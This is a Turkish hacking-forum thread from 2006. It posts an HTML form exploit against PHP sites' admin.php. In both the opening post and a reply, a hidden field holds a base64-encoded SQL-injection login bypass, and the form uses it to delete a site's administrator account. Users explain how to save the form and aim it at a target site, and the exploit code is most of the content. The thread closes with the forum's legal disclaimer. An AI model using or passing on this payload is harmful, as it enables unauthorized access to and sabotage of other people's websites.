sitenizin adminini silin

21 Şub 2006
31
0
Sİtenİzİn Admİnİnİ Sİlİn <form name="mantra" method="POST" action="http://www.adresiyazınız.com/admin.php">
USERNAME: <input type="text" name="del_aid">

<input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox">
<br>
<input type="hidden" name="add_radminsuper" value="1">
<br>
<input type="hidden" name="op" value="deladminconf">
<input type="submit" name="Submit" value="Delete Admin">
<br>
</p>
</form>

not:username nin yanı bos kalsın sadece site adresini yazınız.html cinsinden kaydettikten sonra yandaki kutuya sitenin admini yazıp delete admine tıklıosunuz ve admin silinio....
kolay gelsin

dj_skr

Yeni üye
18 Haz 2006
34
0
UNDERGROUND SITY
arkadaslar sımcık ben bu ıslerde yenıyım konuyu koyan arkdsım cok tskkr cok gzl bı konu koymussun ama bıraz anlatsan hanı nasıl yapıcagımızı ben tam olarak anlıyamadım zahmet olucak ama napıyım anlayamadım sımdıden tskkr ederım

OnLy

Emektar
26 Ara 2005
837
35
Ötüken
dj_skr' Alıntı:
arkadaslar sımcık ben bu ıslerde yenıyım konuyu koyan arkdsım cok tskkr cok gzl bı konu koymussun ama bıraz anlatsan hanı nasıl yapıcagımızı ben tam olarak anlıyamadım zahmet olucak ama napıyım anlayamadım sımdıden tskkr ederım

<form name="mantra" method="POST" action="http://www.siteadi.com/admin.php">
USERNAME: <input type="text" name="del_aid">

<input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox">
<br>
<input type="hidden" name="add_radminsuper" value="1">
<br>
<input type="hidden" name="op" value="deladminconf">
<input type="submit" name="Submit" value="Delete Admin">
<br>
</p>
</form>

bu acik eskiden vardi simdi varmi bilmiyorum versiyona uygun bir tane php kurulu siteye bunlari ekliyorsur / koyarak ve adminligi siliniyor bu kadar basit

ama dedigim gibi şimdi kaldımı bilmiyorum:(

Selametle

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.